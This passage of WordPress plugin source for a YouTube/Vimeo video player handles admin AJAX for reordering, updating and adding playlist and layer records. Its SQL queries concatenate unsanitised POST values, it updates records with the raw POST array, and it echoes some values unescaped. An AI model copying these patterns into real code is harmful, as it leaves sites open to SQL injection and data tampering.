	return video_player_youtube_vimeo_generate_video_player_youtube_vimeo($atts['settings_id']);

}






register_activation_hook(__FILE__,"video_player_youtube_vimeo_activate"); //activate plugin and create the database
add_action('init', 'video_player_youtube_vimeo_init_sessions');	// initialize sessions
add_action('init', 'video_player_youtube_vimeo_load_styles');	// loads required styles
add_action('init', 'video_player_youtube_vimeo_load_scripts');			// loads required scripts
add_action('admin_menu', 'video_player_youtube_vimeo_plugin_menu'); // create menus
add_shortcode('video_player_youtube_vimeo', 'video_player_youtube_vimeo_shortcode');				// video_player_youtube_vimeo shortcode

add_action('wp_logout','video_player_youtube_vimeo_end_sessions');
add_action('wp_login','video_player_youtube_vimeo_end_sessions');

/** OTHER FUNCTIONS **/

//stripslashes for an entire array
function video_player_youtube_vimeo_unstrip_array($array){
	if (is_array($array)) {
		foreach($array as &$val){
			if(is_array($val)){
				$val = unstrip_array($val);
			} else {
				$val = stripslashes($val);

			}
		}
	}
	return $array;
}



function video_player_youtube_vimeo_getCssStyles($currentCssClass,$id,$div_data){
	global $wpdb;

	$safe_sql="SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_css_definitions) LIMIT 0, 1";
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	$temp_class='';
	$classes_arr=array();
	$startPos=0;
	$endPos=0;
	$endClassContentPos=0;


	$startPos=strpos($row['css_styles'],'.',$startPos);
	$endPos=strpos($row['css_styles'],'{',$startPos);
	while ($startPos!==FALSE) {
		$temp_class=trim(substr($row['css_styles'],$startPos+1,$endPos-1-$startPos));
		if (strpos($temp_class,' a')===FALSE)
			$classes_arr[]=$temp_class;
		$endClassContentPos=strpos($row['css_styles'],'}',$endPos);
		$startPos=strpos($row['css_styles'],'.',$endClassContentPos);
		$endPos=strpos($row['css_styles'],'{',$startPos);
	}

	$div_data_end="";
	if ($div_data!='')
		$div_data_end="';";

	?>
    <?php echo stripslashes($div_data);?><select name="css<?php echo esc_attr($id);?>" id="css<?php echo esc_attr($id);?>"  onchange="change_text_div_css_class(<?php echo esc_js($id);?>,this)"><?php echo stripslashes($div_data_end);?>
    <?php
		foreach ($classes_arr as $class_elem) {
	?>
              <?php echo stripslashes($div_data);?><option value="<?php echo stripslashes($class_elem);?>" <?php echo (($class_elem==$currentCssClass)?'selected="selected"':'')?>><?php echo stripslashes($class_elem);?></option><?php echo stripslashes($div_data_end);?>
    <?php
		}
	?>
            <?php echo stripslashes($div_data);?></select><?php echo stripslashes($div_data_end);?>
<?php }





/* ajax update playlist record */

add_action('admin_head', 'video_player_youtube_vimeo_update_playlist_record_javascript');

function video_player_youtube_vimeo_update_playlist_record_javascript() {
	global $wpdb;
	//Set Your Nonce
	$video_player_youtube_vimeo_update_playlist_record_ajax_nonce = wp_create_nonce("video_player_youtube_vimeo_update_playlist_record-special-string");
	$video_player_youtube_vimeo_add_text_record_ajax_nonce = wp_create_nonce("video_player_youtube_vimeo_add_text_record-special-string");
	$video_player_youtube_vimeo_delete_text_record_ajax_nonce = wp_create_nonce("video_player_youtube_vimeo_delete_text_record-special-string");
	$video_player_youtube_vimeo_edit_css_classes_record_ajax_nonce = wp_create_nonce("video_player_youtube_vimeo_edit_css_classes_record-special-string");
	$video_player_youtube_vimeo_preview_record_ajax_nonce = wp_create_nonce("video_player_youtube_vimeo_preview_record-special-string");
	$video_player_youtube_vimeo_duplicate_record_ajax_nonce = wp_create_nonce("video_player_youtube_vimeo_duplicate_record-special-string");

	if(strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) {
		$page = (isset($_GET['page'])) ? $_GET['page'] : '';
		if(preg_match('/YOUTUBE_VIMEO_VIDEO_PLAYER/i', $page)) {
?>




<script type="text/javascript" >

//delete the entire record
function video_player_youtube_vimeo_delete_entire_record (delete_id) {
	if (confirm('Are you sure?')) {
		jQuery("#video_player_youtube_vimeo_sortable").sortable('disable');
		jQuery("#"+delete_id).css("display","none");
		jQuery("#video_player_youtube_vimeo_updating_witness").css("display","block");
		var data = "action=video_player_youtube_vimeo_update_playlist_record&security=<?php echo esc_js($video_player_youtube_vimeo_update_playlist_record_ajax_nonce); ?>&updateType=video_player_youtube_vimeo_delete_entire_record&delete_id="+delete_id;
		// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
		jQuery.post(ajaxurl, data, function(response) {
			jQuery("#video_player_youtube_vimeo_sortable").sortable('enable');
			jQuery("#video_player_youtube_vimeo_updating_witness").css("display","none");
		});
	}
}



function video_player_youtube_vimeo_add_text_line_CONTENT(textID,maxORD,photoid,img_src) {

		newZindex=100-maxORD;

		if (img_src=='') {
			content_aux='TEXT HERE '+(jQuery('#video_player_youtube_vimeo_layers_sortable').children().size()+1);
			content_title='HTML Content';
			image_path='';
			draggable_aux=content_aux;
			css_aux="video_player_youtube_vimeo_textWhiteBgBlack_medium";
			img_src_hidden="hidden";
			changeImgBtn_css="none";
		} else {
			content_aux='IMAGE '+(jQuery('#video_player_youtube_vimeo_layers_sortable').children().size()+1);
			content_title='Image Title';
			image_path='Image Path';
			draggable_aux='<img src="'+img_src+'">';
			css_aux="video_player_youtube_vimeo_textWhiteBgTransparent_small";
			img_src_hidden="text";
			changeImgBtn_css="block";
		}

		jQuery("#no_layers").css('display','none');
		jQuery("#photo_div"+photoid).append('<div id="draggable'+textID+'" rel="'+textID+'" class="my_draggable '+css_aux+'" style="left:0px;top:0px;z-index:'+newZindex+';" onclick="activate_layer('+textID+');">'+draggable_aux+'</div>');

		jQuery("#video_player_youtube_vimeo_layers_sortable").prepend('<li class="ui-state-default cursor_move" id="'+textID+'" data-photoid="'+photoid+'" onclick="activate_layer('+textID+');"><div id="li_div'+textID+'">'+content_aux+'</div> <input name="ord_input_'+textID+'" type="text" disabled="disabled" id="ord_input_'+textID+'" style="float:right; margin-top:-20px;" value="'+maxORD+'" size="3" readonly="readonly" /></li>');
		activate_layers_order_li(textID);

		//activate delete layer button
		jQuery('input[name=currentTextID]').val(textID);
		jQuery('#deletelayer').removeAttr("disabled");
		jQuery('#duplicatelayer').removeAttr("disabled");

		jQuery("#draggable"+textID).draggable( {
			drag: function(event, ui) {
				jQuery("#data-final-left"+textID).val(video_player_youtube_vimeo_process_val(jQuery(this).css('left'),'left'));
				jQuery("#data-final-top"+textID).val(video_player_youtube_vimeo_process_val(jQuery(this).css('top'),'top'));
			}
		});

		jQuery("[id^='video_player_youtube_vimeoTable']").css({
			'display':'none'
		});


		jQuery('[id^="draggable"]').removeClass("my_draggable_activated");
		jQuery("#draggable"+textID).addClass("my_draggable_activated");


		var div_data='<div id="video_player_youtube_vimeoTable'+textID+'">';
		div_data+='<table width="100%" cellspacing="0" class="widefat">';
		div_data+='<tr>';
		div_data+='<td width="15%" align="left" valign="middle" class="row-title">'+content_title+'</td>';
		div_data+='<td colspan="3" align="left" valign="middle"><textarea name="content'+textID+'" cols="80" rows="5" id="content'+textID+'" onkeyup="change_text_div_content('+textID+',this);">'+content_aux+'</textarea></td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">CSS Style</td>';
		div_data+='<td colspan="3" align="left" valign="middle"><div id="video_player_youtube_vimeoCSS_div'+textID+'">';
		<?php video_player_youtube_vimeo_getCssStyles('video_player_youtube_vimeo_textWhiteBgBlack_medium','unique_xyz','div_data+=\'');?>
		div_data+='</div> <input name="EditCssClasses'+textID+'" id="EditCssClasses'+textID+'" type="button" class="button-primary" value="Edit CSS Clases" style="float:right; margin-top:-25px;" onclick="video_player_youtube_vimeo_edit_css_classes(\'open\',\'\',\'\')"></td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle">&nbsp;</td>';
		div_data+='<td width="35%" align="left" valign="middle">&nbsp;</td>';
		div_data+='<td width="15%" align="left" valign="middle">&nbsp;</td>';
		div_data+='<td width="35%" align="left" valign="middle">&nbsp;</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td colspan="4" align="left" valign="middle" class="lbg_regGrayWithBg">Animation Values</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">Initial Left</td>';
		div_data+='<td align="left" valign="middle"><input name="data-initial-left'+textID+'" type="text" id="data-initial-left'+textID+'" size="10" value="0" /> px</td>';
		div_data+='<td align="left" valign="middle" class="row-title">Inital Top</td>';
		div_data+='<td align="left" valign="middle"><input name="data-initial-top'+textID+'" type="text" id="data-initial-top'+textID+'" size="10" value="0" /> px</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">Final Left</td>';
		div_data+='<td align="left" valign="middle"><input name="data-final-left'+textID+'" type="text" id="data-final-left'+textID+'" size="10" value="0" /> px</td>';
		div_data+='<td align="left" valign="middle" class="row-title">Final Top</td>';
		div_data+='<td align="left" valign="middle"><input name="data-final-top'+textID+'" type="text" id="data-final-top'+textID+'" size="10" value="0" /> px</td>';
		div_data+='</tr>';


		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">Duration</td>';
		div_data+='<td align="left" valign="middle"><input name="data-duration'+textID+'" type="text" id="data-duration'+textID+'" size="10" value="0" /> seconds</td>';
		div_data+='<td align="left" valign="middle" class="row-title">Delay</td>';
		div_data+='<td align="left" valign="middle"><input name="data-delay'+textID+'" type="text" id="data-delay'+textID+'" size="10" value="0" /> seconds</td>';
		div_data+='</tr>';
		div_data+='<tr>';
		div_data+='<td align="left" valign="middle" class="row-title">Initial Fade</td>';
		div_data+='<td align="left" valign="middle"><input name="data-fade-start'+textID+'" type="text" id="data-fade-start'+textID+'" size="10" value="0" /> (0-100)</td>';
		div_data+='<td align="left" valign="middle" class="row-title">&nbsp;</td>';
		div_data+='<td align="left" valign="middle">&nbsp;</td>';
		div_data+='</tr>';


		div_data+='</table>';
		div_data+='</div>';

		jQuery("#all_texts_settings").append(div_data.replace(/unique_xyz/g,textID));

		jQuery("#css"+textID).val(css_aux);


		var lis = jQuery('#video_player_youtube_vimeo_layers_sortable').children();

		var i=0;
		lis.each(function() {
			i++;
		   currentLi = jQuery(this);
		   //new order
		   jQuery('input[name=ord_input_'+currentLi.attr('id')+']').val(i);

		   //new z-index
			jQuery('#draggable'+currentLi.attr('id')).css({
				'zIndex':100-i
			});
		});
}


function video_player_youtube_vimeo_add_text_line(photoid,img_src) {
	var data ="action=video_player_youtube_vimeo_add_text_record&security=<?php echo esc_js($video_player_youtube_vimeo_add_text_record_ajax_nonce); ?>&photoid="+photoid+"&img_src="+img_src;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
		response_arr=response.split("####");
		textID=response_arr[0];
		maxORD=response_arr[1];

		video_player_youtube_vimeo_add_text_line_CONTENT(textID,maxORD,photoid,img_src);

	});


}


function video_player_youtube_vimeo_delete_text_line(textid) {
	var data ="action=video_player_youtube_vimeo_delete_text_record&security=<?php echo esc_js($video_player_youtube_vimeo_delete_text_record_ajax_nonce); ?>&textid="+textid;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
			var deleted_ord=response;

			jQuery('#'+textid).remove();
			var lis = jQuery('#video_player_youtube_vimeo_layers_sortable').children();
			lis.each(function() {
			   currentLi = jQuery(this);
			   old_ord=jQuery('input[name=ord_input_'+currentLi.attr('id')+']').val();
			   if (parseInt(old_ord,10)>parseInt(deleted_ord,10)) {
			   		jQuery('input[name=ord_input_'+currentLi.attr('id')+']').val(old_ord-1);
			   }
			});


			jQuery('#draggable'+textid).remove();

			jQuery('[id^="video_player_youtube_vimeoTable"]').css({
					'display':'none'
			});

			//disable delete button
			jQuery('#deletelayer').attr("disabled", "disabled");
			jQuery('#duplicatelayer').attr("disabled", "disabled");

	});
}



function change_text_div_css_class(theID,sel) {
	jQuery("#draggable"+theID).removeClass(jQuery("#draggable"+theID).attr('class'));

	jQuery("#draggable"+theID).addClass('my_draggable');
	jQuery("#draggable"+theID).addClass(sel.options[sel.selectedIndex].value);
	jQuery("#draggable"+theID).addClass("my_draggable_activated");
}

function change_text_div_content(theID,textareaID) {
	var theTEXT=jQuery(textareaID).val();
	theTEXT=theTEXT.replace(/<\/?[^>]+>/gi, '');
		jQuery('#draggable'+theID).html(theTEXT);
	if (theTEXT.length>50) {
		theTEXT=theTEXT.substring(0,50);
		theTEXT+='...';
	}
	jQuery('#li_div'+theID).html(theTEXT);
}

function change_layer_image() {
	 formfield = 'img_src';
	 tb_show('', 'media-upload.php?type=image&amp;TB_iframe=true');
	 return false;
}

function video_player_youtube_vimeo_process_val(val,cssprop) {
	retVal=parseInt(val.substring(0, val.length-2));
	if (cssprop=="top") {
		retVal=retVal-0;
	} else {
	}
	return retVal;
}

function deactivate_all_layers() {
	jQuery('[id^="draggable"]').removeClass('my_draggable_activated');

	//order div
	activate_layers_order_li(0);

	//disable settings table
	jQuery("[id^='video_player_youtube_vimeoTable']").css({
		'display':'none'
	});

	//disable delete button
	jQuery('#deletelayer').attr("disabled", "disabled");
	jQuery('#duplicatelayer').attr("disabled", "disabled");
}

function activate_layer(theID) {
		//activate delete layer button
		jQuery('input[name=currentTextID]').val(theID);
		jQuery('#deletelayer').removeAttr("disabled");
		jQuery('#duplicatelayer').removeAttr("disabled");

		jQuery('[id^="video_player_youtube_vimeoTable"]').css({
			'display':'none'
		});

		jQuery('#video_player_youtube_vimeoTable'+theID).css({
			'display':'block'
		});

		jQuery('[id^="draggable"]').removeClass("my_draggable_activated");
		jQuery("#draggable"+theID).addClass("my_draggable_activated");

		//order div
		activate_layers_order_li(theID);
}


function activate_layers_order_li(theID) {
	var list = jQuery("#video_player_youtube_vimeo_layers_sortable").children();
	list.each(function() {
		if (jQuery(this).attr('id')==theID)
			jQuery(this).css({'border':'1px solid #000000'});
		else
			jQuery(this).css({'border':'1px solid #dfdfdf'});
	});
}

function video_player_youtube_vimeo_edit_css_classes(action_type,theVal,playlistID) {
	if (action_type=='open') {
		jQuery( "#dialogEditCSSClasses" ).dialog( "open" );
	} else {
		var data ="action=video_player_youtube_vimeo_edit_css_classes_record&security=<?php echo esc_js($video_player_youtube_vimeo_edit_css_classes_record_ajax_nonce); ?>&action_type="+action_type+"&theVal="+theVal+"&playlistID="+playlistID;

		// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
		jQuery.post(ajaxurl, data, function(response) {
			response_arr=response.split("#*#*");
			for(i=0;i<response_arr.length ;i++) {
				if (i==0) {
					new_css_select=response_arr[0];
				} else {
					if (i==response_arr.length-1) {
						jQuery('#css_styles_div').html(response_arr[response_arr.length-1]);
						jQuery('textarea#css_classes').val(response_arr[response_arr.length-1]);
					} else {
						orig_css=jQuery("#css"+response_arr[i]).val();
						jQuery('#video_player_youtube_vimeoCSS_div'+response_arr[i]).html(new_css_select.replace(/unique_xyz/g,response_arr[i]));
						jQuery("#css"+response_arr[i]).val(orig_css);
					}
				}
			}


			jQuery('#editCSSClasses_message').css('display','block');
			jQuery('#editCSSClasses_message').html('CSS classes updated!');

			setTimeout(function(){
					 jQuery('#editCSSClasses_message').css('display','none');
       				 jQuery('#dialogEditCSSClasses').dialog('close');
    			}, 1000);

		});
	}
}





function video_player_youtube_vimeo_duplicate(action_type,recordID) {
	var data ="action=video_player_youtube_vimeo_duplicate_record&security=<?php echo esc_js($video_player_youtube_vimeo_duplicate_record_ajax_nonce); ?>&action_type="+action_type+"&recordID="+recordID;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
		jQuery('#form-elements-video_player_youtube_vimeo').submit();
	});
}


function showDialogPreview(thePlayerID) {  //load content and open dialog
	var data ="action=video_player_youtube_vimeo_preview_record&security=<?php echo esc_js($video_player_youtube_vimeo_preview_record_ajax_nonce); ?>&thePlayerID="+thePlayerID;

	// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
	jQuery.post(ajaxurl, data, function(response) {
		jQuery('#previewDialogIframe').attr('src','<?php echo plugins_url("tpl/preview.html?d=".time(), __FILE__)?>');
		jQuery("#previewDialog").dialog("open");
	});
}



jQuery(document).ready(function($) {
	/*PREVIEW DIALOG BOX*/
	jQuery( "#previewDialog" ).dialog({
	  minWidth:1200,
	  minHeight:500,
	  title:"Player Preview",
	  modal: true,
	  autoOpen:false,
	  hide: "fade",
	  resizable: false,
	  open: function() {
	  },
	  close: function() {
		jQuery('#previewDialogIframe').attr('src','');
	  }
	});

	/* THE PLAYLIST */
	if (jQuery('#video_player_youtube_vimeo_sortable').length) {
		jQuery( '#video_player_youtube_vimeo_sortable' ).sortable({
			placeholder: "ui-state-highlight",
			start: function(event, ui) {
	            ord_start = ui.item.prevAll().length + 1;
	        },
			update: function(event, ui) {
	        	jQuery("#video_player_youtube_vimeo_sortable").sortable('disable');
	        	jQuery("#video_player_youtube_vimeo_updating_witness").css("display","block");
				var ord_stop=ui.item.prevAll().length + 1;
				var elem_id=ui.item.attr("id");
				var data = "action=video_player_youtube_vimeo_update_playlist_record&security=<?php echo esc_js($video_player_youtube_vimeo_update_playlist_record_ajax_nonce); ?>&updateType=change_ord&ord_start="+ord_start+"&ord_stop="+ord_stop+"&elem_id="+elem_id;
				// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
				jQuery.post(ajaxurl, data, function(response) {
					jQuery("#video_player_youtube_vimeo_sortable").sortable('enable');
					jQuery("#video_player_youtube_vimeo_updating_witness").css("display","none");
				});
			}
		});
	}

/* THE LAYERS */
	if (jQuery('#video_player_youtube_vimeo_layers_sortable').length) {
		jQuery( '#video_player_youtube_vimeo_layers_sortable' ).sortable({
			placeholder: "ui-state-highlight",
			start: function(event, ui) {
	            ord_start = ui.item.prevAll().length + 1;
	        },
			update: function(event, ui) {
	        	jQuery("#video_player_youtube_vimeo_layers_sortable").sortable('disable');
	        	jQuery("#video_player_youtube_vimeo_updating_witness").css("display","block");
				var ord_stop=ui.item.prevAll().length + 1;
				var elem_id=ui.item.attr("id");
				var photoid=ui.item.attr("data-photoid");

				var lis = jQuery('#video_player_youtube_vimeo_layers_sortable').children();
				var i=0;
				lis.each(function() {
					i++;
				   currentLi = jQuery(this);
				   //new order
				   jQuery('input[name=ord_input_'+currentLi.attr('id')+']').val(i);

				   //new z-index
				    jQuery('#draggable'+currentLi.attr('id')).css({
						'zIndex':100-i
					});
				});


				var data = "action=video_player_youtube_vimeo_update_playlist_record&security=<?php echo esc_js($video_player_youtube_vimeo_update_playlist_record_ajax_nonce); ?>&updateType=change_layers_ord&ord_start="+ord_start+"&ord_stop="+ord_stop+"&photoid="+photoid+"&elem_id="+elem_id;
				// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
				jQuery.post(ajaxurl, data, function(response) {
					jQuery("#video_player_youtube_vimeo_layers_sortable").sortable('enable');
					jQuery("#video_player_youtube_vimeo_updating_witness").css("display","none");
				});
			}
		});
	}


	<?php
		$rows_count = $wpdb->get_var( "SELECT COUNT(*) FROM ". $wpdb->prefix . "video_player_youtube_vimeo_playlist;" );
		for ($i=1;$i<=$rows_count;$i++) {
	?>

            	jQuery('#upload_img_button_video_player_youtube_vimeo_<?php echo esc_js($i)?>').on('click', function( event ){
						var file_frame;
						event.preventDefault();
						// If the media frame already exists, reopen it.
						if ( file_frame ) {
							file_frame.open();
							return;
						}
						// Create the media frame.
						file_frame = wp.media.frames.file_frame = wp.media({
							title: jQuery( this ).data( 'uploader_title' ),
							button: {
							text: jQuery( this ).data( 'uploader_button_text' ),
							},
							multiple: false // Set to true to allow multiple files to be selected
						});
						// When an image is selected, run a callback.
						file_frame.on( 'select', function() {
							// We set multiple to false so only get one image from the uploader
							attachment = file_frame.state().get('selection').first().toJSON();
							// Do something with attachment.id and/or attachment.url here
							document.forms["form-playlist-video_player_youtube_vimeo-"+<?php echo esc_js($i)?>].img.value=attachment.url;
							jQuery('#img_'+<?php echo esc_js($i)?>).attr('src',attachment.url);
						});
						// Finally, open the modal
						file_frame.open();
				});



            	jQuery('#upload_thumbnail_button_video_player_youtube_vimeo_<?php echo esc_js($i)?>').on('click', function( event ){
						var file_frame;
						event.preventDefault();
						// If the media frame already exists, reopen it.
						if ( file_frame ) {
							file_frame.open();
							return;
						}
						// Create the media frame.
						file_frame = wp.media.frames.file_frame = wp.media({
							title: jQuery( this ).data( 'uploader_title' ),
							button: {
							text: jQuery( this ).data( 'uploader_button_text' ),
							},
							multiple: false // Set to true to allow multiple files to be selected
						});
						// When an image is selected, run a callback.
						file_frame.on( 'select', function() {
							// We set multiple to false so only get one image from the uploader
							attachment = file_frame.state().get('selection').first().toJSON();
							// Do something with attachment.id and/or attachment.url here
							document.forms["form-playlist-video_player_youtube_vimeo-"+<?php echo esc_js($i)?>]['data-bottom-thumb'].value=attachment.url;
							jQuery('#thumbnail_'+<?php echo esc_js($i)?>).attr('src',attachment.url);
						});
						// Finally, open the modal
						file_frame.open();
				});

	jQuery("#form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>").on('submit', function( event ) {

		/* stop form from submitting normally */
		event.preventDefault();

		//show loading image
		jQuery('#ajax-message-<?php echo esc_js($i)?>').html('<img src="<?php echo plugins_url('video_player_youtube_vimeo/images/ajax-loader.gif', dirname(__FILE__))?>" />');
		var data ="action=video_player_youtube_vimeo_update_playlist_record&security=<?php echo esc_js($video_player_youtube_vimeo_update_playlist_record_ajax_nonce); ?>&"+jQuery("#form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>").serialize();

		// since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
		jQuery.post(ajaxurl, data, function(response) {
			var element_to_show = '';
			if (document.forms["form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>"]['img'].value!='') {
				new_img=document.forms["form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>"]['img'].value;
				element_to_show='Image: <img src="'+new_img+'" height="30" align="absmiddle" id="top_image_<?php echo esc_js($i)?>" />';
			}
			if (document.forms["form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>"]['data-youtube'].value) {
				element_to_show='YouTube ID: '+document.forms["form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>"]['data-youtube'].value;
			}
			if (document.forms["form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>"]['data-vimeo'].value) {
				element_to_show='Vimeo ID: '+document.forms["form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>"]['data-vimeo'].value;
			}

			jQuery('#item_header_'+document.forms["form-playlist-video_player_youtube_vimeo-<?php echo esc_js($i)?>"].id.value).html(element_to_show);

			jQuery('#ajax-message-<?php echo esc_js($i)?>').html(response);
		});
	});
	<?php } ?>

});
</script>
<?php
	$safe_sql="SELECT * FROM (".$wpdb->prefix ."video_player_youtube_vimeo_css_definitions) LIMIT 0, 1";
	$row = $wpdb->get_row($safe_sql,ARRAY_A);
	echo '<style id="css_styles_div">'.$row['css_styles'].'</style>';
		}
	}
}

add_action('wp_ajax_video_player_youtube_vimeo_update_playlist_record', 'video_player_youtube_vimeo_update_playlist_record_callback');

function video_player_youtube_vimeo_update_playlist_record_callback() {

	check_ajax_referer( 'video_player_youtube_vimeo_update_playlist_record-special-string', 'security' ); //security=<?php echo esc_js($video_player_youtube_vimeo_update_playlist_record_ajax_nonce);
	global $wpdb;
	global $video_player_youtube_vimeo_messages;
	$errors_arr=array();

	//delete entire record
	if (array_key_exists('updateType', $_POST) && $_POST['updateType']=='video_player_youtube_vimeo_delete_entire_record') {
		$delete_id=$_POST['delete_id'];
		$safe_sql=$wpdb->prepare("SELECT * FROM ".$wpdb->prefix."video_player_youtube_vimeo_playlist WHERE id = %d",$delete_id);
		$row = $wpdb->get_row($safe_sql, ARRAY_A);
		$row=video_player_youtube_vimeo_unstrip_array($row);

		//delete the entire record
		$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."video_player_youtube_vimeo_playlist WHERE id = %d",$delete_id));
		//update the order for the rest ord=ord-1 for > ord
		$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_playlist SET ord=ord-1 WHERE playerid = %d and  ord>".$row['ord'],$_SESSION['xid']));
	}

	//update elements order
	if (array_key_exists('updateType', $_POST) && $_POST['updateType']=='change_ord') {
		$sql_arr=array();
		$ord_start=$_POST['ord_start'];
		$ord_stop=$_POST['ord_stop'];
		$elem_id=(int)$_POST['elem_id'];
		$ord_direction='+1';
		if ($ord_start<$ord_stop)
			$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_playlist SET ord=ord-1  WHERE playerid = %d and ord>".$ord_start." and ord<=".$ord_stop, $_SESSION['xid']);
		else
			$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_playlist SET ord=ord+1  WHERE playerid = %d and ord>=".$ord_stop." and ord<".$ord_start, $_SESSION['xid']);
		$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_playlist SET ord=%d WHERE id=%d", $ord_stop,$elem_id);

		foreach ($sql_arr as $sql)
			$wpdb->query($sql);
	}


	//update layers order
	if (array_key_exists('updateType', $_POST) && $_POST['updateType']=='change_layers_ord') {
		$sql_arr=array();
		$ord_start=$_POST['ord_start'];
		$ord_stop=$_POST['ord_stop'];
		$elem_id=(int)$_POST['elem_id'];
		$photoid=(int)$_POST['photoid'];
		$ord_direction='+1';
		if ($ord_start<$ord_stop)
			$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_texts SET ord=ord-1  WHERE photoid = %d and ord>".$ord_start." and ord<=".$ord_stop, $photoid);
		else
			$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_texts SET ord=ord+1  WHERE photoid = %d and ord>=".$ord_stop." and ord<".$ord_start, $photoid);
		$sql_arr[]=$wpdb->prepare( "UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_texts SET ord=%d WHERE id=%d", $ord_stop,$elem_id);

		foreach ($sql_arr as $sql)
			$wpdb->query($sql);
	}




	//submit update

	$theid=isset($_POST['id'])?$_POST['id']:0;
	if($theid>0 && !count($errors_arr)) {
		$except_arr=array('Submit'.$theid,'id','ord','action','security','updateType','_wp_http_referer','set_key_auth','_wpnonce');
		foreach ($_POST as $key=>$val){
			if (in_array($key,$except_arr)) {
				unset($_POST[$key]);
			}
		}

		$wpdb->update(
			$wpdb->prefix .'video_player_youtube_vimeo_playlist',
			$_POST,
			array( 'id' => sanitize_text_field($theid) )
		);
		?>
			<div id="message" class="updated"><p><?php esc_html_e($video_player_youtube_vimeo_messages['data_saved']);?></p></div>
	<?php
	} else if (!isset($_POST['updateType'])) {
		$errors_arr[]=$video_player_youtube_vimeo_messages['invalid_request'];
	}
	if (count($errors_arr)) { ?>
		<div id="error" class="error"><p><?php echo implode("<br>", $errors_arr);?></p></div>
	<?php }

	wp_die(); // this is required to return a proper result
}



add_action('wp_ajax_video_player_youtube_vimeo_add_text_record', 'video_player_youtube_vimeo_add_text_record_callback');

function video_player_youtube_vimeo_add_text_record_callback() {

	check_ajax_referer( 'video_player_youtube_vimeo_add_text_record-special-string', 'security' );
	global $wpdb;

	$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."video_player_youtube_vimeo_texts SET ord=ord+1 WHERE photoid = %d",$_POST['photoid']));

	if ($_POST['img_src']=='') {
			$css_aux="video_player_youtube_vimeo_textWhiteBgBlack_medium";
	} else {
			$css_aux="video_player_youtube_vimeo_textWhiteBgTransparent_small";
	}

	$new_max_ord = 1+$wpdb->get_var( $wpdb->prepare( "SELECT max(ord) FROM ". $wpdb->prefix ."video_player_youtube_vimeo_texts WHERE photoid = %d",$_POST['photoid'] ) );
	$max_ord=1;
	if ($_POST['img_src']=='') {
		$content_aux='TEXT HERE '.$new_max_ord;
	} else {
		$content_aux='IMAGE '.$new_max_ord;
	}
$wpdb->insert(
			$wpdb->prefix . "video_player_youtube_vimeo_texts",
			array(
				'photoid' => sanitize_text_field($_POST['photoid']),
				'img_src' => sanitize_text_field($_POST['img_src']),
				'content' => sanitize_text_field($content_aux),
				'element-link' =>'',
				'element-link-target' =>'',
				'data-initial-left' => 0,
				'data-initial-top' => 0,
				'data-initial-scale' => '1',
				'data-initial-skew' => '0deg,0deg',
				'data-final-left' => 0,
				'data-final-top' => 0,
				'data-final-scale' => '1',
				'data-final-skew' => '0deg,0deg',
				'data-duration' => 0,
				'data-fade-start' => 0,
				'data-delay' => 0,
				'data-easing' => 'swing',
				'data-exit-left' => 0,
				'data-exit-top' => 0,
				'data-exit-fade' => 1,
				'data-exit-scale' => '1',
				'data-exit-skew' => '0deg,0deg',
				'data-exit-duration' => 0,
				'data-exit-delay' => 0,
				'data-exit-easing' => 'swing',
				'data-exit-off' => 'false',
				'data-intermediate-left' => 0,
				'data-intermediate-top' => 0,
				'data-intermediate-scale' => '1',
				'data-intermediate-skew' => '0deg,0deg',
				'data-intermediate-duration' => 0,
				'data-intermediate-delay' => 0,
				'data-intermediate-easing' => 'linear',
				'css' => sanitize_text_field($css_aux),
				'ord' => 1
			),
			array(
'%d',
'%s',
'%s',
'%s',
'%s',
'%d',
'%d',
'%s',
'%s',
'%d',
'%d',
'%s',
'%s',
'%f',
'%d',
'%f',
'%s',
'%d',
'%d',
'%d',
'%s',
'%s',
'%f',
'%f',
'%s',
'%s',
'%d',
'%d',
'%s',
'%s',
'%f',
'%f',
'%s',
'%s',
'%d'
			)
		);

		echo esc_html($wpdb->insert_id).'####'.esc_html($max_ord);

		wp_die(); // this is required to return a proper result
}




